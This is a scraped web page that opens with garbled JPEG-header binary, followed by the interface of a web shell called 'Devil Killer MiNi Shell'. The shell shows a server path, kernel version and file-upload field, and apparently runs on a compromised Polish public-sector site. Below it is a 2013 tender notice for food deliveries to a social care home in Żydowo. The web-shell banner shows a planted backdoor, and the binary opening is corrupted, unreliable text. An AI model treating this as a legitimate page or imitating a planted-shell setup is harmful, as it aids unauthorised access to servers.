JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131025/435770-N-2013.html

<p class="kh_header"><b>Żydowo: SUKCESYWNE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH
NA POTRZEBY DOMU POMOCY SPOŁECZNEJ W ŻYDOWIE</b><br>
<b>Numer ogłoszenia: 435770 - 2013; data zamieszczenia: 25.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Żydowie , Żydowo 112, 76-012 Żydowo, woj. zachodniopomorskie, tel. 094 3188879, -87, - 89, faks 094 3188879.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> dps.zydowo.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH
NA POTRZEBY DOMU POMOCY SPOŁECZNEJ W ŻYDOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych na potrzeby Domu   Pomocy Społecznej w Żydowie CPV 03000000-1 Produkty rolnictwa, hodowli, rybołówstwa,   leśnictwa i podobne CPV  15000000-8 Żywność, napoje  z podziałem na części:
Część Nr 1-Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin
Część Nr 2-Sukcesywna dostawa   mięsa drobiowego produktów mięsnych  i wędlin
Część nr 3 - Sukcesywne dostawy produktów ogólno-spożywczych
Część nr 4 - Sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich  
Cześć nr 5 - Sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy
Część nr 6 - Sukcesywne dostawy świeżych warzyw, owoców i ziemniaków
Część nr 7 - Sukcesywne dostawy ryb przetworzonych i konserwowanych
Część nr 8   -Sukcesywne dostawy jaj konsumpcyjnych 
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia z podziałem na osiem części.

3)	Dostawa przedmiotu zamówienia następować będzie loco magazyn żywnościowy Domu Pomocy Społecznej w Żydowie transportem Wykonawcy na jego koszt i ryzyko.

4)	Artykuły będące przedmiotem zamówienia będą wytworzone i dostarczane zgodnie z ustawą o bezpieczeństwie żywności i żywienia z dnia 25.08.2006r. (tj. Dz. U. 2010 Nr 136, poz. 914 z późn. zm.) oraz aktualnych rozporządzeń wydanych na jej podstawie.

5)	Wykonawca gwarantuje wysoką jakość artykułów zgodną z normami oraz zobowiązuje się do udzielenia gwarancji jakościowej na dostarczane artykuły (min. ? okresu określonego przez producenta), gwarancja rozpoczyna swój bieg od dnia odbioru przez Zamawiającego. Gwarancja rozpoczyna swój bieg od daty odbioru każdej partii towaru.

6)	Przedmiot dostawy powinien posiadać aktualny termin przydatności do spożycia oraz odpowiadać co do jakości normom i atestom obowiązującym w Polsce.

7)	Aktualny termin przydatności artykułów do spożycia,  ma być oznaczony na każdym artykule  w zależności od kategorii w sposób  czytelny,

8)	Dostawy częściowe, o których mowa w pkt 1 następować będą w terminie nie dłuższym niż 2 dni robocze od daty otrzymania zamówienia, chyba że Zamawiający ustali dłuższy termin.

9)	Zamówienie składane  na dostawę  przesłane będzie faxem lub telefoniczne.

10)	Zamawiane artykuły powinny być dostarczane w opakowaniach (skrzynki, pojemniki itp.). Opakowanie powinno być dostosowane do właściwości danego artykułu i odpowiednie z punktu widzenia higieny i bezpieczeństwa zdrowotnego żywności, zgodnie z obowiązującymi przepisami. Środki transportu powinny być czyste i bez obcych zapachów.

11)	Wykonawca zapewnia dostawy przedmiotu zamówienia  przez cały okres trwania umowy.
12)	Zamawiający zastrzega sobie prawo do niewykorzystania  pełnego limitu ilościowego   przedmiotu zamówienia   bez prawa roszczeń z tego  tytułu przez Wykonawcę ,a w szczególności z tytułu niezrealizowania umowy do pełnej wartości. Przysługuje  mu tylko   zapłata za faktycznie dostarczoną ilość.

13)	Zamawiający zastrzega sobie prawo zmian ilościowych asortymentu danej części określonego w  załączniku nr 1 do niniejszej siwz w granicach ogólnej wartości danej części zamówienia. Zmiany te nie stanowią zmiany umowy. 

14)	W związku z obowiązującym w Domu Pomocy Społecznej systemem HACCP należy przedstawić  w momencie rozpoczęcia dostaw i na żądanie SANEPID-u   n/w dokumenty:
a)	Decyzja Państwowego Powiatowego Inspektoratu Sanitarnego dla środka transportu zezwalająca na przewóz produktów spożywczych.
b)	Aktualne orzeczenie lekarskie z badania do celów sanitarno-epidemiologicznych osoby dostarczającej towar

16)	Umożliwienie kontroli środka transportu i pojemników (opakowań) do przewozu towaru pod   kątem czystości.

17)	Do każdej dostawy Wykonawca dołącza:
.	handlowy dokument identyfikacyjny
.	WZ lub Fakturę

18)	Odbioru jakościowego artykułów  dokonuje Zamawiający w chwili ich dostawy.

19)	Jako termin realizacji dostawy rozumie się datę złożenia podpisu na dokumencie odbioru dostawy  przez
      osobę  upoważnioną do odbioru ze strony Zamawiającego.

20)	W przypadku dostarczenia artykułów z wadami lub brakami Wykonawca dokona wymiany lub ich
     uzupełnienia na artykuły wolne od wad na swój koszt w terminie 24 godzin od dostawy artykułów.

21)	W razie wykrycia w terminie późniejszym wad w przedmiocie dostawy Zamawiający zobowiązany jest 
     niezwłocznie złożyć Wykonawcy reklamację ustnie lub faksem do dokumentu odbioru.

22)	Załatwienie reklamacji winno nastąpić niezwłocznie w trybie indywidualnych uzgodnień i w sposób
     właściwy dla danego towaru, nie później niż w ciągu 2 dni od zgłoszenia.
 
23)	W przypadku niedostarczenia przez Wykonawcę artykułów wcześniej zamówionych, o niższej niż  
     deklarowana jakości lub w jakikolwiek inny sposób niezgodnej z przedmiotem zamówienia,  
     Zamawiającemu przysługuje prawo do zakupu interwencyjnego odpowiedniej ilości artykułów, będących 
     przedmiotem dostawy, na wolnym rynku od innego dostawcy w ilości i asortymencie nie zrealizowanej 
     dostawy.
24)	W przypadku zakupu interwencyjnego Wykonawca zobowiązany jest do zwrotu Zamawiającemu różnicy 
     pomiędzy ceną zakupu interwencyjnego, a  ceną dostawy ustaloną w zawartej z Wykonawcą umowie.
 
25)	Płatność będzie realizowana sukcesywnie po każdej dostawie przedmiotu zamówienia do Zamawiającego,  na podstawie faktur  wystawianych   na płatnika:   Dom Pomocy Społecznej ,76-012 Żydowo 107,  

26)	Należność płatna przelewem na rachunek Wykonawcy  w terminie 30 dni licząc od daty  doręczenia faktury do Zamawiającego na adres: Dom Pomocy Społecznej ,76-012 Żydowo 107,

27)	W szczególnych przypadkach wynikających z okoliczności, których nie można było przewidzieć, na   
     etapie prowadzonego postępowania o udzielenie zamówienia publicznego; np. zaprzestanie produkcji, 
     zmiana nazwy asortymentu, dopuszcza się możliwość zastąpienia go towarem o  nie gorszych 
     parametrach i w tej samej cenie.

28)	Wykonawca realizujący przedmiot zamówienia  z wykorzystaniem podwykonawców zobowiązany jest do wskazania w swojej ofercie części zamówienia(zakresu),których wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi odpowiedzialność za jakość realizacji przedmiotu zamówienia przez podwykonawców oraz zobowiązany jest do zapłaty wynagrodzenia na ich rzecz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.14.25.00-3, 03.20.00.00-3, 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.11.30.00-3, 15.11.40.00-0, 15.13.11.30-5, 15.13.11.34-3, 15.13.14.10-2, 15.13.13.10-1, 15.40.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi wykazać, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie minimum realizacji jednego zamówienia na dostawy artykułów spożywczych o wartości nie mniejszej niż :Część Nr 1-60.000 zł(sześćdziesiąt tysięcy złotych)Część Nr 2-20.000 zł(dwadzieścia tysięcy złotych)Część Nr 3-35.000 zł(trzydzieści pięć tysięcy złotych)Część Nr 4-25.000 zł(dwadzieścia  pięć tysięcy złotych)Część Nr 5-60.000 zł(sześćdziesiąt tysięcy złotych)Część Nr 6-35.000 zł(trzydzieści pięć tysięcy złotych)Część Nr 7-10.000 zł(dziesięć tysięcy złotych)Część Nr 8-10.000 zł(dziesięć tysięcy złotych)Na potwierdzenie spełniania postawionego warunkuWykonawca musi złożyć wykaz na/wg załącznika nr 6do SIWZ wraz z wymaganymi załącznikami.
Ocena spełniania w/w warunków zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia
 i dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	SZCZEGÓŁOWE ZESTAWIENIE ILOŚCIOWE PRZEDMIOTU ZAMÓWIENIA  Część Nr..............                                                                                        wypełnione na/wg Załącznika nr 1 do SIWZ

2)	WYPEŁNIONY FORMULARZ OFERTOWY               sporządzona na/wg   Załącznika nr 2 do SIWZ.
3)	INFORMACJA WYKONAWCY o tym, że nie należy do grupy kapitałowej 
                                                                                                 sporządzona  na/wg     Załącznika nr 7 do SIWZ .

                                                                                                                                                                                    4)	OŚWIADCZENIE WYKONAWCY, że posiada atesty na dostarczane    
produkty(HACCP lub Handlowy Dokument  Identyfikacyjny),a także oświadczenie, iż na każde żądanie Zamawiającego   przedstawi dokumenty    potwierdzające to oświadczenie 
                                                                                         sporządzone na/wg Załącznika nr 10 do SIWZ

 5)	Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć PEŁNOMOCNICTWO(A) do działania w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy, ewentualnie inne działania np. podpisanie umowy) - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych dokumentów.

6)ZOBOWIĄZANIE sporządzone na/wg Załącznika nr 9 do SIWZ wypełniają tylko te podmioty, które udostępniają Wykonawcy swoje zasoby.


DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:
W świetle postawionych w niniejszym postępowaniu warunków udziału w postępowaniu, Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają tak jak Wykonawcy polscy oświadczenia i dokumenty wymienione w pkt XI  pdpkt 1,2,3 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadku:
1)	wystąpienia siły wyższej,
2)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps.zydowo.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Materiały przetargowe są dostępne  oraz w formie papierowej w siedzibie Domu Pomocy Społecznej w Żydowie 107, pok.3, w dni robocze w godz. od 9.00 - 14.00,
tel.(094)  318-88-87 wew.34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2013 godzina 11:00, miejsce: DOM POMOCY SPOŁECZNEJ W ŻYDOWIE  76 - 012 Żydowo 107
pow. Koszalin   pokój nr 5 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy mięsa  wieprzowego, produktów mięsnych i wędlin na potrzeby Domu  Pomocy Społecznej w Żydowie.
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.11.30.00-3, 15.11.40.00-0, 15.13.00.00-8, 15.13.11.30-5, 15.13.11.34-3, 15.13.13.10-1, 15.13.13.10-1, 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa   mięsa drobiowego produktów mięsnych  i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy mięsa drobiowego produktów mięsnych  i wędlin na potrzeby Domu Pomocy Społecznej w Żydowie.
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.20.00-6, 15.11.21.30-6, 15.13.11.35-0, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy produktów ogólno-spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy produktów ogólno-spożywczych.Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część NR 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.00.00-0, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.98.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskichna potrzeby Domu  Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia są sukcesywne dostawy dostawy mleka, produktów mleczarskich i tłuszczy dla Domu Pomocy Społecznej w Żydowie.
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Cześć Nr 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywne dostawy świeżych warzyw, owoców i ziemniaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy świeżych warzyw, owoców i ziemniaków na potrzeby Domu  Pomocy Społecznej w Żydowie .
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sukcesywne dostawy ryb przetworzonych i konserwowanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy ryb przetworzonych i konserwowanych na potrzeby Domu Pomocy Społecznej w Żydowie. 
